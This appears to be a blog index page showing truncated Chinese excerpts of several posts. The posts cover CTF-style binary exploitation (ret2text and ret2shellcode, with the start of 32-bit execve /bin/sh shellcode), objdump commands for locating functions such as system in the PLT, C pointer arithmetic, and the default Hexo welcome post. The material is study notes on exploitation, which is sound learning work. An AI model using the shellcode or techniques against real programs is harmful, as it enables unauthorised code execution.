# 1.ret2text 条件：程序中含有后门函数 # 2.ret2shellcode 条件：程序不开启 NX 保护 32 位 shellcode： shellcode=asm(""" push 0x68 #h push 0x732f2f2f #s/// push 0x6e69622f #nib/ mov ebx,esp #将 /bin///sh 传入 ebx xor ecx,ecx #ecx 置零 xor edx,edx #edx 置零 push 11 pop eax #将 0xb 传入 eax int 0x80...

# 1. 查看汇编代码 objdump -t XXX : 查看程序中使用到的函数 objdump -d XXX ：查看程序中函数的汇编代码 objdump -d -j .plt XXX : 查看 plt 表 -j 的参数有：.text - 代码段 ​ .const - 只读数据段（有些编译器不使用此段，将只读数据并入.data 段 ​ .data - 读写数据段 ​ .bss -bss 段 objdump -d -M intel 程序名 |grep 函数名：查看某程序内某函数地址 objdump -d -j .plt ./filename |grep system : 查找程序中 plt...

# 1. 指针 特性：一种全新的类型，四字节宽度，可以进行 ++，–，+，-，<,> 运算 ++：加上去掉一个星号之后的宽度大小 –：减去去掉一个星号的宽度大小 +：加上或减去一个整数时 ​ 带星类型变量 +（-）N = 带星类型变量 +（-）N 乘（去掉一个星后的类型宽度） 两个类型相同的带星类型的变量可以进行减法操作（相减的结果要除以去掉一个星后的数据宽度） 类型相同的带星类型可以做大小的比较 char* x=“china”#x 保存的是 "china" 的地址，"china"...

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. # Quick Start # Create a new post 1$ hexo new "My New Post" More info: Writing # Run...